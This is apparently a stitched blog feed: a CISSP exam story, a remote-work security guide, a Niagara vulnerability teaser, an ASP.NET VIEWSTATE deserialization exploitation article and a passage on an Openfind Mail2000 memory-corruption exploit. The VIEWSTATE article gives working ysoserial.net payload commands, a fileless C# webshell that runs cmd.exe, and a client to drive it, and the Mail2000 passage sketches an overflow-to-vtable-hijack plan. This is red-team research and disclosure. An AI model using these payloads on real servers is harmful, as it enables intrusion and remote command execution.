Part-3: You Didn’t Do All This Work For Nothing, Did You?

Time: Mid-March 2020

When I scheduled my exam I purposely chose a Saturday morning. I did not want to deal with the variables that a “normal” morning commute might include – so I was going to be lazy and Uber to the testing center. But being so paranoid, I just drove there and paid the crazy fee to park in the garage. I listened to Kelly’s “Why You Will Pass The CISSP” video and Larry Greenblatt’s “CISSP Exam Tips” videos before leaving the car. Crazy seeing only about 4 people out, when on a regular day a low count would be around 50-100, with tons of traffic at any given time – people jogging, women pushing strollers, people and their dogs, as well as tons of business folk – it’s directly across the street from a train station.

At this point, the sports reference is boxing. Here are my thoughts walking from the garage to the exam center: “You did not come this far to lose, did you? You’ve been wrong countless times on Discord and understood why. You worked your buns off! You learned the material, the mindset; you’ve watched hundreds of videos, did thousands of questions, read tons of pages. You’ve got some of the most distinguished practical offensive certs in existence – are you going to let a multiple-choice management exam, which most people fail because they don’t slow down to read, defeat you? You’re going to knock this exam on its face. You already envisioned this day many times before. This is going to turn out just like all the other times – you put in the work and the results are going to prove such is true at the end. If you synthesized the information the way you think you did, you’re going to do amazing.” This is how I’m trying to make myself feel.

In reality I’m scared as shit about this exam 😂 It’s not that I don’t know the material – it’s that I don’t know what I don’t know. Most people on Reddit say when they see the first 25 questions they sometimes wonder if the proctor configured them for the wrong exam 😌 Here’s what calmed me down and sorta grounded me. I had small talk with a guy as we were walking to the bathroom and we asked one another what we were up against this morning. Turns out he, along with 90% of the other people there (16 total), was taking his medical exam. It was 7 hrs! I literally said to myself “Shitttt boy you got it good!” 🤣 It’s all relative 💭 My number gets called and I get seated for the exam. They had disposable covers for the noise-cancelling headphones 🤞🏽

I had this plan to write all my brain-dump stuff on the pad they gave me before starting. You get 5 minutes to read and sign the NDA. One of the things I wanted to write down was the forensic process. I started to list the phases out and got stuck after “Collection” – it scared the living fucking daylights out of me. I said “F-This” and clicked “Start Exam”. True story 🤦🏽‍♂️

Part-4: Put Up Or Shut Up!

The questions didn’t seem like they were designed to trick me. I was comfortable with the terms in most questions. The difficulty is in the subjective and vague nature of all the questions. Unlike the practice questions, which test whether you know terms and definitions, the exam places you in scenarios where you play from the perspective of a security manager and have to apply sound risk management principles – remembering your job is to reduce risk, provide information for senior management, and apply the appropriate level of protection to your assets depending on their value and classification. Most of the questions are BEST, LEAST, WORST, with all the possible choices either being all right or all wrong. On a bunch of occasions I was able to eliminate 2 off the jump. The remaining 2 choices are what’s going to keep you up at night. I got a crazy subnetting question that I attempted to start breaking down on my pad to binary, doing the powers of 2; after 20 seconds I said “F-This” and clicked “Next”. There were some gimmes sprinkled in there as well. Don’t forget “inch deep, mile wide” – it’s way too much material for every single question to be a boulder. I made sure to slow down, scrutinize every word in the questions, re-read all questions and answers, and read back the answer I chose. If a question was “Blah blah blah… Which of the following features of Digital Signatures would BEST provide you with a solution to prevent unauthorized tampering?” and the answer is integrity, before moving on I’d say “Integrity is the feature of Digital Signatures that best provides the solution to the problem.” Here’s what I saw most, followed by a question to illustrate the context for each one:

  • SDLC Related – Which SDLC phase is Change Management most likely to be a part of?
  • BCP Related – A global pandemic of a deadly virus is on the brink. How does the BIA help you determine your risk?
  • IR Related – The sky is falling and something just hit you in the head. What phase of IR are you most likely in?
  • Bunch of stuff on Access Controls – How can I best protect this if that?
  • One question on Encryption – Understand PPP, L2TP, PPTP, and L2F, their succession, and which ones can use IPSec and EAP
  • Bunch of Risk Management – Something just happened and you need to do something, with these constraints. What’s best?
  • Asset and Data Classification/Security – Why do we classify anything?
  • Web Application Attack Recognition – Seeing and recognizing attacks described through a scenario or graphical depiction
  • US and Global Privacy Frameworks – GDPR, ECPA, OECD
  • Roles and Responsibilities – Who’s MOST important for security? CISO, CEO, ISM, ISSO?
  • Communication & Network Security – What layer is LLC most likely a part of?

I was nervous as hell clicking “Next” on the 100th question. I knew if the exam ended I had either done really well or really horribly; if it continued, I knew I was exactly on the borderline and could still pass up to 150, but each question would have to be correct. If that were the case I wouldn’t have been pissed, but I didn’t want to even be in that situation. The exam stops. I’m like “HOLY SHIT”. I get the TA’s attention, she signs me out, and I go to the reception area to get the print-out. The receptionist was at the bathroom 😫 I had to wait 5 minutes for her to come back. I was pacing so much the entire time I probably could have burned a hole in their damn carpet. The lady takes my ID, prints out the result, peeks at it, folds it, and gives it to me looking me dead in the eye with a straight face. But I did notice it was one piece of paper, and people say if you get one paper you passed – if you get more, it’s because you failed and that’s the explanation of the domains you came up short in. I opened it and saw I had PASSED 😍 I threw the wildest air punch in history (luckily didn’t hurt myself), jumped up and down a little (nobody else in the reception area at this point), said “LET’S GO” as loud as I could (since the students are literally just around the corner), and noticed the receptionist now smiling, so she said “Congratulations, sorry I had to mess with you” 😂 Here it was guys, that moment of passing that I envisioned! Slaying the dragon. What a wonderful feeling 💘

Part-5: Thoughts?

If you’ve made it this far s/o to you! I’ll never write a TL/DR ever ✌🏽 The context matters … The journey matters.

My biggest advice would be to make the NIST RMF, SDLC, and all the related documents your friend. These will help you substantially more than doing a zillion practice questions or reading the huge books, and they shed light on why so many smart technical folks fail this exam the first time. The day before the exam, me, @Beedo, and @Reepdeep (MAJOR S/O TO THOSE GUYS – WHO ALSO PASSED THE SAME DAY) studied from 1 pm to 10 pm, going through all the processes from each domain in our own words, understanding the steps of each process and how every single thing is tied back to risk management.
NOTE: We think the document we created could help everyone out there out as a definitive source for passing the exam. Obviously folks need to get back to the real life and people they’ve neglected since beginning the journey but it’s something we all feel strongly about and want to provide to the community hopefully soon 😎

Part-6: Things I Shared on Discord That I Think Should Be Included Here?

These are just excerpts, but I figured they may be valuable since you forget basically everything related to the exam afterwards.
Bear with me, as the grammar may not be perfect; it's Discord, so I'm not necessarily going back to correct mistakes. It's conversational, texting-like language, most of it typed from my phone.

In regards to the difference in seemingly all the practice material vs real exam:

“I see why all the practice material miss the mark. It’s because you truly need a intelligent person to be able to spend the time to make those questions and that person cost too much to write free questions on the internet for us .. Those aren’t ones you come up with based on a definition .. You understand someone thought deeply about this, so much so they knew the answer I’d immediately go for (and it’s wrong) is included as say answer A and make the right answer further down the list like D. You need to be very careful. Also saw 2 similar looking answers where you jumped immediately to the answer and didn’t thoroughly read it would have noticed the 2nd one further down was more right”

In regards to our day before exam study conference: 

it was impromptu as hell I was just going each of my Boson question explanation. It lasted lot longer than expected 😵🥴 went from like 1-10 yesterday on conference, went over each process understanding it and connecting the SDLC steps BCP steps back to RMF I’m sure they’ll agree understanding how everything relates back to RMF is the way to pass. Not technical … Not all the questions … Since they’re way to technical (use em to identify and reinforce you’re weak areas) we were already studied up at that point … Sybex/Boson/AIO/All the sources questions way to hard if we talking scope for exam. You’ll be placed in a bunch of situations where you’re somebody in security what’s BEST LEAST solution for this scenario.

On depth of question and context. Keep in mind we already knew the blocks lengths, key size ect:

For context it’s like understanding AES is a strong symmetric algorithm, DES is a weak one that shouldn’t be used. But not that 3DES EEE has a xyz length bit size and it goes through xy rounds – the latter is unnecessary .. If you know it so be it but that’s how I would scope everything. High level and how does is connect back to RMF .. I would read the RMF and SDLC NIST doc every night

On what I think is useful studying:

I’m saying you’ve read Sybex or over big book feel comfortable been browsing reddit know the sources the videos and all the questions we do here then can go through the 11th hr and understand everything then I would focus on the processes and how it relates to RM SDLC, IR, BCP knowing how those relate was my entire exam. I had a bunch of SDLC stuff lot of OWASP what vulnerability is this? Few question from domain 4 IPSec and understanding the protocol or layer.

Overall exam tips and thoughts:

“The exam was tough but I didn’t feel any point they were trying to trick or deceive me, every question was able to eliminate two answers of back. Some of the answers are similar then you figure out differences which was slightly hard in some cases some not. Felt familiar with all the terms answers. Question were clear. I didn’t even notice the experimental which I was on look out for. I think when studying we equate inch deep mile wide to difficult. In reality it’s just understanding how the domains work together. Remember every question CANNOT be a boulder. There were some gimmes… what is encryption… what is integrity for digital signatures type stuff. My best advice in hindsight with the above is DO NOT WASTE YOUR TIME doing all these questions, Boson, Ccure, Luke, Sybex. All of them! Only if you’re weak. If you can read 11th hr and notice everything nothings a shock stop. Understand how everything is bound by risk management. Btw I didn’t use the whole mgr mindset I just tried pick best 2 remaining options. There were plenty of answers that were “doing something” I threw those out automatically”

On how I would study differently:

“don’t worry and spend some time in the nist document’s 800-64 800-37 they all link to each other. So your thinking going through say SDLC is what am I doing in this step and how does it relate back to the RMF everything relates back to it. For example that in phase one of  the SDLC you have your requirements and stuff but you’re also initially understanding the systems that links back to step one in RMF which is Categorize, so think does this system store transmit or processes pii, what’s the risk. Or step two Development in SDLC, you know you starting design architecture development and testing, that relates to steps 2&3 (you also do risk assessment here) in RMF you’re identified the need for the system in initial requirements, so now in development we select the controls of the system and assess them that’s in SDLC phase two but you’re always grounded by RMF. See how that relates? I think that understanding this alone is how I passed”

Are questions from sybex syllabus or out of the box?
Wayy to technical as well as all the practice questions

Some people fail who had boson?
Boson shouldn’t be used to judge readiness just identity weak areas. You could get 20% on all bosons and pass since it’s mostly thinking not technical

How’s the difficulty level?
NOT DIFFICULT – DON’T BELIEVE THE HYPE – ALL OF US COULD PASS THIS EXAM

Do we need other source of study hindsight?
Read the NIST documents on all the processes and reclaim some of your time back

You are say every in this group can pass, can you tell your experience and main domain?
Mainly offsec and I do appsec at work for like 4 years. I’m an engineer so i have the fix it mindset by default. You don’t need be expert in anything. Just think of everything in risk mgmt is enough to pass

How long you have been preparing?
Studying since 1/28

What was difficult domain for you?
Domain 2 smh – Focus on 1,3,7 thought and definitely 8.. Obviously you need to be passing in all domains but since those weighted more it more advisable

Did you face any language mixing puzzle questions means they use different vocabulary 
There were NO gimmicks every question i knew exactly what they wanted.

Do you think feedback from people different industry get it more difficult than security?
It’s your understanding and mindset. Kelly and Larry tell you the mindset. I automatically threw any answer out that was “disconnect from network, make a firewall change”.

Did you feel it’s purely management?
No. Because being in mgmt although you’re not a doer you need to have a solid understanding of the underlying area no matter what it is.”

S/O to my Discord guys ALL OF YOU 💗

I’ve included a section below on the links that were most valuable to me. Good luck & NEVER give up or give in!

Part-7: Links


The post Slayed CISSP appeared first on Certification Chronicles.

Exploiting ASP.NET VIEWSTATE Deserialization and Building Fileless Backdoors

10 March 2020 at 16:00

Introduction

This article follows up on my talk at DEVCORE CONFERENCE 2019 about breaking into hardened web applications built on the ASP.NET framework step by step through small flaws. One part of that talk covered how, in several of our past red team engagements, we successfully used VIEWSTATE deserialization attacks to create a foothold into internal networks. Those techniques and lessons learned are the subject of this post.

Body

Microsoft Exchange Server was recently hit by a critical vulnerability, CVE-2020-0688. The root cause is that every Exchange Server installation uses the same fixed Machine Key in one of its components. By now everyone knows the playbook once you hold a Machine Key: tamper with the VIEWSTATE parameter of an ASP.NET form to mount a deserialization attack, achieving Remote Code Execution and taking control of the whole server.

For more details on CVE-2020-0688, see the ZDI blog:

Countless articles on the Internet already dissect the VIEWSTATE exploit in depth, so this post will not repeat that analysis. Instead, it focuses on how to actually use the VIEWSTATE exploit during a penetration test.

The most basic and common approach is to use the ViewState plugin of ysoserial.net to generate a payload with a valid MAC and correctly encrypted content. The TypeConfuseDelegate gadget, after a chain of reflection calls, by default invokes Process.Start on cmd.exe, which triggers execution of arbitrary system commands.

For example:

ysoserial.exe -p ViewState -g TypeConfuseDelegate
              -c "echo 123 > c:\pwn.txt"
              --generator="CA0B0334"
              --validationalg="SHA1"
              --validationkey="B3B8EA291AEC9D0B2CCA5BCBC2FFCABD3DAE21E5"

A malformed VIEWSTATE usually makes the aspx page respond with 500 Internal Server Error, so we cannot see the command output directly. But once we have arbitrary execution, popping a reverse shell with PowerShell or sending command output to an external server is not hard.

But…

In real-world penetration testing, things are rarely that smooth. Corporate security awareness is relatively high nowadays, and the following restrictions on target servers have become the norm:

  • All outbound connections are blocked
  • External DNS lookups are forbidden
  • The web root is not writable
  • The web root is writable, but a defacement-protection mechanism automatically restores files

This is where another gadget, ActivitySurrogateSelectorFromFile, comes in handy. This gadget achieves Remote Code Execution by calling Assembly.Load to dynamically load a .NET assembly. In other words, it gives us the ability to execute arbitrary .NET code in the same runtime as the aspx pages. .NET also exposes, by default, global static variables that point at shared resources; for example, System.Web.HttpContext.Current returns the context object of the current HTTP request. Effectively, we can run an aspx page of our own writing, with the whole process handled dynamically in memory, which amounts to establishing a fileless WebShell backdoor!

We only need to change the -g parameter to ActivitySurrogateSelectorFromFile; the -c parameter now takes not a system command but the ExploitClass.cs C# source file we want to execute, followed by the required dependency DLLs, separated by semicolons.

ysoserial.exe -p ViewState -g ActivitySurrogateSelectorFromFile
              -c "ExploitClass.cs;./dlls/System.dll;./dlls/System.Web.dll"
              --generator="CA0B0334"
              --validationalg="SHA1"
              --validationkey="B3B8EA291AEC9D0B2CCA5BCBC2FFCABD3DAE21E5"

The required DLLs can be found on any Windows host with the .NET Framework installed; in my environment they are under the path C:\Windows\Microsoft.NET\Framework64\v4.0.30319.

As for the crucial ExploitClass.cs, how should it be written? I will try to submit it to ysoserial.net, so you may find it in the example files there; in the meantime, you can look at it here:

class E
{
    public E()
    {
        System.Web.HttpContext context = System.Web.HttpContext.Current;
        context.Server.ClearError();
        context.Response.Clear();
        try
        {
            System.Diagnostics.Process process = new System.Diagnostics.Process();
            process.StartInfo.FileName = "cmd.exe";
            string cmd = context.Request.Form["cmd"];
            process.StartInfo.Arguments = "/c " + cmd;
            process.StartInfo.RedirectStandardOutput = true;
            process.StartInfo.RedirectStandardError = true;
            process.StartInfo.UseShellExecute = false;
            process.Start();
            string output = process.StandardOutput.ReadToEnd();
            context.Response.Write(output);
        } catch (System.Exception) {}
        context.Response.Flush();
        context.Response.End();
    }
}

Both Server.ClearError() and Response.End() are necessary and important steps. A malformed VIEWSTATE inevitably makes the aspx page respond with 500 or another unexpected Server Error; calling the first function clears the error recorded on the stack of the current runtime, while calling End() makes ASP.NET mark the current context as handled and return the response to the client immediately, preventing the program from continuing into other error handlers that would make the command output unrecoverable.

At this point, as long as you attach this malicious VIEWSTATE to every request you send, you can operate it like an ordinary WebShell:
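To drive the in-memory shell, each request carries the malicious VIEWSTATE plus the cmd field read by ExploitClass.cs above. A minimal Python sketch; the target URL and the base64 payload are hypothetical, and real pages may also require fields such as __VIEWSTATEGENERATOR:

```python
import urllib.parse
import urllib.request

def build_form(viewstate_b64: str, cmd: str) -> str:
    # "cmd" matches the form field read by ExploitClass.cs in this article;
    # additional hidden form fields may be needed depending on the page.
    return urllib.parse.urlencode({"__VIEWSTATE": viewstate_b64, "cmd": cmd})

def run_cmd(url: str, viewstate_b64: str, cmd: str) -> str:
    """POST the malicious VIEWSTATE plus a command; the injected class
    writes the command's output straight into the response body."""
    req = urllib.request.Request(url, data=build_form(viewstate_b64, cmd).encode())
    with urllib.request.urlopen(req, timeout=30) as resp:
        return resp.read().decode("utf-8", errors="replace")
```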

Sometimes, though, you run into this situation:

No matter how you tweak and resend the payload, you always get a Server Error, and you start questioning your life Q_Q

Don't lose heart just yet; you may simply have hit a target whose server is dutifully kept up to date. Microsoft once shipped patches against the ActivitySurrogateSelector gadget that block its direct use, but fortunately other researchers quickly published a workaround that makes this gadget exploitable again!

For the details, read this article: Re-Animating ActivitySurrogateSelector by Nick Landers

In short, if you run into the situation above, first generate a VIEWSTATE with the following command and send it to the server once. If it works, the DisableActivitySurrogateSelectorTypeCheck variable in the target runtime gets set to true, and subsequently sent ActivitySurrogateSelector gadgets will no longer blow up with a 500 Server Error.

ysoserial.exe -p ViewState -g ActivitySurrogateDisableTypeCheck
              -c "ignore"
              --generator="CA0B0334"
              --validationalg="SHA1"
              --validationkey="B3B8EA291AEC9D0B2CCA5BCBC2FFCABD3DAE21E5"

If everything above went smoothly and you can execute system commands and read back the results, that is enough for most purposes; for the rest, let your imagination run free!

That said, sometimes even at this stage there are unexplained errors and the MAC never computes correctly. The internal .NET algorithms and the combinations of environment parameters involved are complicated enough that no tool can easily cover every case. When that happens, my current fallback is manual labor: build the environment locally, configure the same MachineKey, hand-write an aspx file, generate the gadget-bearing VIEWSTATE there, and relay it to the target host. If you have other findings or different ideas you are willing to share, feel free to come chat with me.

Security Considerations for Remote Work

3 March 2020 at 16:00

Due to the recent impact of the novel coronavirus (COVID-19), many companies have opened up telework and work from home (WFH) for their staff. As the epidemic accelerates, rolling this out across the board without thorough preparation may run into security issues that have not yet been considered. This article provides a simple guide: what exactly should you watch out for when working remotely from home? We discuss it from two perspectives: corporate management and the individual user.

If you only want the highlights, skip to the final section, TL;DR.

Attack Techniques

Let's first talk about attack techniques. Consider the following scenarios; all of them have been used by us during red team engagements, and all of them can be corporate blind spots.

  1. Scenario 1, VPN credential stuffing: Employee A connects to the corporate intranet over VPN, but uses a favorite personal username and password for the VPN account and reuses that combination on outside, non-company services (such as Facebook or Adobe), where it has long since leaked in past breach incidents. The attack team targets A and uses that password to log into the company. Unfortunately, the VPN is not strictly segmented from the internal network, so the attackers directly reach the internal employee portal and obtain all kinds of sensitive data.
  2. Scenario 2, VPN vulnerabilities: VPN flaws have become a primary target for attackers. Company B's VPN server contains a vulnerability; the attack team takes control of the server through it, then uses the management console to configure a client logon script that runs malware when employees sign in, gaining control of their computers and stealing confidential company documents. See Orange & Meh's earlier research: https://www.youtube.com/watch?v=v7JUMb70ON4
  3. Scenario 3, man-in-the-middle: Employee C works from home over PPTP VPN. Unfortunately, the computer of C's child has pirated software containing malware installed on it. The attacker uses that machine to mount a man-in-the-middle (MITM) attack on the home network, hijacks C's traffic, cracks the VPN credentials, and successfully enters the corporate intranet.

These are just a few of the more common scenarios. The attack surface available to an adversary is extremely broad, while watertight defense is hard for any company. That is why we wrote this article: to help companies reach a baseline of security even while working remotely.

What Are the Risks

Risk is the potential harm an event can cause to a given subject. Achieving that harm with the attack techniques introduced above is not difficult for an attacker. Below we list some factors that, under a company's security rules, may greatly increase an attacker's odds of success when work goes remote:

  • Complex environments: the company cannot control home or remote work environments, which are messier and riskier. Internal management and monitoring mechanisms are hard to extend there, and it is difficult to require monitoring agents on employees' personal devices at home.
  • Leakage or misuse of company data: if company data is leaked or misused, losses can be severe.
  • Lost or stolen devices: whether a laptop or a phone, loss or theft brings a risk of data exposure.
  • Authorization and access control are hard to implement: granting external access to a large number of employees on short notice inevitably forces trade-offs between availability and security.

If the company allows staff to connect to the corporate VPN from personal devices, the issues are the same as BYOD (Bring Your Own Device), for which plenty of reference material on the security concerns exists, e.g. NIST SP 800-46, Guide to Enterprise Telework, Remote Access, and Bring Your Own Device (BYOD) Security: https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-46r2.pdf

The Company Side

Next, let's look at what companies can do security-wise for remote work.

Workflow and Policy Planning

  • Workflow adjustments: how each process should adapt to remote work, e.g. collaborating across locations, consolidating work materials, and verifying deliverables and quality.
  • Data inventory: which data lives in the cloud, on servers, or on personal computers; which data becomes inaccessible when working remotely, and where data should be migrated.
  • Meeting procedures: choose and test video conferencing equipment and software, and confirm that the meeting software encrypts its communications. Anticipate issues such as longer meetings, people talking over each other, and degraded call quality over distance.
  • Incident response team and process: who is responsible for security incidents that occur during remote work, how they are handled, and how losses are assessed.
  • Need-to-know and least privilege: apply the need-to-know basis and the Principle of Least Privilege (PoLP), granting each employee only the minimum data and permissions required, to avoid additional security problems.

Network Management

  • VPN account requests and inventory: which employees need VPN access, which groups they belong to, and the distinct permissions and connection ranges of each group.
  • VPN permission scope and intranet segmentation: a VPN session should not be able to reach every host on the corporate intranet. VPN traffic should be treated as external traffic, with a higher risk rating, and its reach segmented and controlled accordingly.
  • Monitor VPN traffic and behavior: use internal network traffic monitoring to confirm there is no anomalous VPN usage.
  • Issue IP addresses only to allow-listed devices: only registered devices may obtain internal IP addresses, keeping suspicious devices off the internal network.
  • Enable multi-factor authentication: turn on MFA for cloud services, the VPN, and internal network services.
  • Keep the VPN server up to date: our past research shows that VPN servers themselves are attack targets, so watch closely for updates and patches.

One point worth singling out is VPN configuration and rollout. We have recently heard management at quite a few companies say that, because of the epidemic, employees who previously had no VPN access now all have it. Yet when asked what monitoring and segmentation exists once a VPN session enters the corporate intranet, few companies have such a plan. The internal network is a major security battleground; whenever you open up VPN access, you must think through the corresponding security measures.

The User Side

With the company prepared, user-side security comes next. Beyond the VPN links, architecture, and mechanisms the company provides, the user's own security awareness, discipline, and security settings matter just as much.

Confidentiality

  • Dedicated device for work: a computer used to access company networks or data should strictly follow this principle; do not use the device for non-work purposes, and do not let non-company people use or operate it.

Devices

  • Enable find-my-device, remote lock, and remote wipe: for portable devices, the loss-response plan must be thought through completely, e.g. how to locate a device, how to lock it, and how to remotely wipe a lost device to prevent data leakage. Mainstream operating systems mostly provide these mechanisms.
  • Device login password: require a password at login so outsiders cannot simply operate the device.
  • Full-disk encryption: if a lost device is forensically analyzed, full-disk encryption lowers the risk of data being recovered.
  • (Optional) MDM (Mobile Device Management): if the company has adopted MDM, it can assist with the management above.

Account and Password Security

  • Use a password manager and set strong passwords: consider using a password manager and setting fully random passwords mixing letters, digits, and symbols.
  • Use a different password for every system: as mentioned in many of our talks, use a unique password per system to prevent credential stuffing.
  • Enable 2FA / MFA on accounts: if a system supports 2FA / MFA, be sure to turn it on for an extra layer of account protection.
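The "fully random strong password" advice above can be sketched with Python's standard library; the length and alphabet here are illustrative choices, not a mandated policy:

```python
import secrets
import string

def gen_password(length: int = 20) -> str:
    """Generate a fully random password mixing letters, digits, and symbols,
    using a cryptographically secure source (the secrets module)."""
    alphabet = string.ascii_letters + string.digits + string.punctuation
    return "".join(secrets.choice(alphabet) for _ in range(length))
```

In practice a password manager does this for you; the point is that each system gets its own long, random, never-reused secret.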

Network Usage

  • Avoid public Wi-Fi for connecting to the company network: public shared networks are quite dangerous and may be sniffed or tampered with. If necessary, use a phone hotspot or reach the Internet through a VPN.
  • Never log into company systems from public computers: public machines cannot be guaranteed free of backdoors, keyloggers, and similar malware; forbid using them to log into any system.
  • Verify whether the connecting device obtains an internal IP address: confirm the internal IP address is correct and internal company systems are reachable as expected.
  • Verify the external egress IP address: confirm the IP address you present to the Internet is the expected one. Especially for a security services company, connecting to customers from a wrong IP address could cause very serious damage.
  • (Optional) Install a personal firewall: a personal firewall provides basic monitoring of suspicious programs attempting outbound connections.
  • (Optional) Use E2EE messaging tools: companies commonly use cloud messaging software; prefer tools with End-to-End Encryption (E2EE), which ensures sensitive internal communications can be decrypted only by insiders, with not even the platform vendor able to access them.
  • (Optional) Turn off unnecessary connectivity (e.g. Bluetooth) while working: some security experts recommend shutting off all non-essential interfaces such as Bluetooth while working; in public environments, a determined attacker might compromise a personal device through a Bluetooth exploit.

Data Management

  • Keep data only on company devices: sensitive company data and documents must be stored only on company devices, to avoid leakage and management problems.
  • Audit logging: record where sensitive data is stored, who modified it, and who owns it.
  • Encrypt important documents: important files must be encrypted, and the password must not be stored in the same directory.
  • Encrypt mail attachments and pass the password over a separate channel: beyond encrypting attachments, the password must be delivered by another channel, e.g. in person, pre-agreed, over an E2EE encrypted channel, or by non-network means.
  • Back up your data: sensitive data must be backed up; you can follow the "3-2-1 Backup Strategy": three copies, two kinds of media, one stored off-site.

Physical Security

  • Lock the screen the moment you step away: make it a habit to immediately trigger the screensaver and lock when leaving the computer; many people just let it lock on its own, but in that gap an attacker can already finish the job.
  • Never plug in unknown USB drives or devices: one social engineering trick is to get staff to plug in a malicious USB stick, which may even destroy the computer (BadUSB, USB Killer).
  • Beware of shoulder surfing and device tampering: if you often work in public spaces, consider buying a privacy screen filter.
  • Do not leave computer equipment in your car: public safety in Taiwan is decent, yet plenty of laptops are stolen from cars; carry important assets with you, or stash them somewhere hidden.
  • Close or lock your work area: when in your own workspace, closing or locking the door buys you more time to respond to surprises.

TL;DR: Don't Neglect Security While Fighting the Epidemic!

Network attack and defense is a war. If you do not think about your defense strategy from the attacker's point of view, not only will you fail to slow attacks effectively; with the global epidemic gradually slipping out of control, malicious actors may use this very moment to attack companies working remotely. We hope our shared experience gives companies some basic guidance, and that both the disasters and the epidemic subside soon. Stay strong, Taiwan!

  • Before opening up VPN services, mind account management and intranet segmentation, so VPN sessions cannot reach arbitrary internal hosts.
  • Use unique, long passwords for cloud and network services, and enable MFA / 2FA multi-factor authentication.
  • When using cloud services, be sure to inventory access permissions so document links cannot be accessed by just anyone.
  • Watch for physical security issues such as device loss, theft, and social engineering.
  • The network is dangerous; use trusted networks, and encrypt communications and transfers.

Tridium Niagara Vulnerabilities

By: JW
5 January 2020 at 20:00
**If you’ve been contacted by me, it is because your device is on the internet and may be vulnerable to the vulnerabilities identified below. Please read through this and contact me if you have questions. Thanks** What is Tridium Niagara? Tridium is the developer of Niagara Framework. The Niagara Framework is a universal software infrastructure...

Carrier Pigeon Post: Digital Pigeon-Napping in Red Team Operations

22 December 2019 at 16:00

Email, as the primary means of information exchange for most enterprises, occupies a strategically pivotal position. Controlling the mail server not only allows eavesdropping on mail contents; many important documents can also be found in the mail system, letting the attacker penetrate even deeper. This article presents a memory corruption vulnerability our research team found in Openfind Mail2000 and the techniques used to exploit it. The vulnerability was discovered in 2018; it was reported to Openfind at the time and patched quickly, and affected customers were assisted with updates.

Openfind Mail2000

Mail2000 is a simple, easy-to-use email system developed by the Taiwanese vendor Openfind, widely used by Taiwan's government agencies and educational institutions; the Taipei City Department of Education, NCSIST, and National Taiwan University of Science and Technology all use Mail2000 as their primary mail server. A typical login portal looks like this:

This vulnerability starts from that web interface and, using binary exploitation techniques, compromises the entire server!

Server Architecture

Mail2000 provides a web interface, i.e. webmail, for administrators and users to operate, and Openfind implemented it with CGI (Common Gateway Interface) technology. Most web servers implement CGI as in the figure: httpd accepts the client's request and, based on the matching CGI path, executes the corresponding CGI program. Most developers then collect commonly shared functions into a library for the CGIs to call. Looking at the lower layers, although we call it a web server, many components are in fact built on native binaries: httpd itself is usually written in C/C++ for performance, and the same goes for libraries, extension modules, and the per-page CGIs. Binary-level vulnerabilities are therefore our attack target this time!

The Vulnerability

The vulnerability lives in libm2kc, a library implemented by Openfind that contains utilities shared across CGIs, such as parameter parsing and file handling; this bug is in the parameter parsing part. Because parameter handling is such a low-level, fundamental feature, the scope of impact is very wide; even Openfind's other products are affected! The trigger conditions are:

  • The attacker sends an HTTP POST request in multipart form
  • The POST data contains more than 200 items

multipart is the format in the HTTP protocol for transferring multiple files, for example:

Content-Type: multipart/form-data; boundary=AaB03x 
 


--AaB03x

Content-Disposition: form-data; name="files"; filename="file1.txt"

Content-Type: text/plain



... contents of file1.txt ...

--AaB03x--

In libm2kc, an array is used to store the parameters:

g_stCGIEnv.param_cnt = 0;
while(p=next_param())
{
  g_stCGIEnv.param[param_cnt] = p;
  g_stCGIEnv.param_cnt++;
}

This array is param inside the global variable g_stCGIEnv. When storing into the param array, the code never checks whether the declared array size has been exceeded, resulting in an out-of-bounds write.

Note that the entries stored in the param array are structures holding pointers to the strings, not the strings themselves:

struct param
{
    char *key;
    char *value;
    int flag;
};

So when the out-of-bounds write triggers, the values written into memory are pointers to strings, and the strings they point to are the parameters that caused the overflow.
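To illustrate the trigger conditions, here is a minimal Python sketch that builds a multipart body with more than 200 form fields; the field names, values, and boundary are arbitrary placeholders, not taken from a real exploit:

```python
def build_multipart(n_params: int = 250, boundary: str = "AaB03x") -> str:
    """Build a multipart/form-data body with n_params simple fields;
    anything above 200 walks past the param[200] array described above."""
    parts = []
    for i in range(n_params):
        parts.append(
            "--%s\r\n"
            'Content-Disposition: form-data; name="p%d"\r\n'
            "\r\n"
            "v%d\r\n" % (boundary, i, i)
        )
    parts.append("--%s--\r\n" % boundary)  # closing boundary
    return "".join(parts)

body = build_multipart()
```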

Exploitation

To exploit the out-of-bounds write, we first need to understand what the overflow lets us do. The global structure being overflowed looks like this:

00000000 CGIEnv          struc ; (sizeof=0x6990, mappedto_95)
00000000 buf             dd ?                    ; offset
00000004 length          dd ?
00000008 field_8         dd 6144 dup(?)          ; offset
00006008 param_arr       param 200 dup(?)
00006968 file_vec        dd ?                    ; offset
0000696C vec_len         dd ?
00006970 vec_cur_len     dd ?
00006974 arg_cnt         dd ?
00006978 field_6978      dd ?
0000697C errcode         dd ?
00006980 method          dd ?
00006984 is_multipart    dd ?
00006988 read_func       dd ?
0000698C field_698C      dd ?
00006990 CGIEnv          ends

The overflowing array is param_arr, so every field after it can be overwritten, including file_vec, vec_len, vec_cur_len, arg_cnt, and so on. The one that caught my attention most is file_vec, a vector used to manage files uploaded via POST. Most vector structures look like this: size records the total capacity of the array and end records how much has been used, so the vector can grow when capacity runs out. If we use the vulnerability to make an overflowing pointer overwrite the vector pointer, we get an effective primitive! By overwriting this vector pointer, we can forge a POST file and all of its associated fields. That POST file structure contains the usual file-related variables, such as path and filename, plus the FILE structure Linux uses to manage files, and that FILE structure is the key to this attack!

FILE Structure Exploit

This attack uses the FILE structure exploitation technique, a relatively recently discovered approach made public by angelboy at HITCON CMT[1].

The FILE structure is what Linux uses for file handling; STDIN, STDOUT, and STDERR, as well as the structure returned by fopen, are all FILEs. The main reason this structure became a breakthrough point for exploitation is the vtable pointer it contains:

struct _IO_FILE_plus
{
  FILE file;
  const struct _IO_jump_t *vtable;
};

The vtable records various function pointers, corresponding to the various file-handling operations:

struct _IO_jump_t
{
    JUMP_FIELD(size_t, __dummy);
    JUMP_FIELD(size_t, __dummy2);
    JUMP_FIELD(_IO_finish_t, __finish);
    /* ... */
    JUMP_FIELD(_IO_read_t, __read);
    JUMP_FIELD(_IO_write_t, __write);
    JUMP_FIELD(_IO_seek_t, __seek);
    JUMP_FIELD(_IO_close_t, __close);
    /* ... */
};

So if we can tamper with or forge this vtable, we can hijack the program's control flow whenever it performs file operations! That lets us lay out the following attack steps:

  1. Open a connection and invoke a CGI
  2. Use a large number of parameters to overwrite the vector pointer
  3. Forge the FILE* inside a POST file so that it points to a fake FILE structure
  4. Have the CGI flow invoke a FILE-related operation
    • fread, fwrite, fclose, …
  5. Hijack the control flow

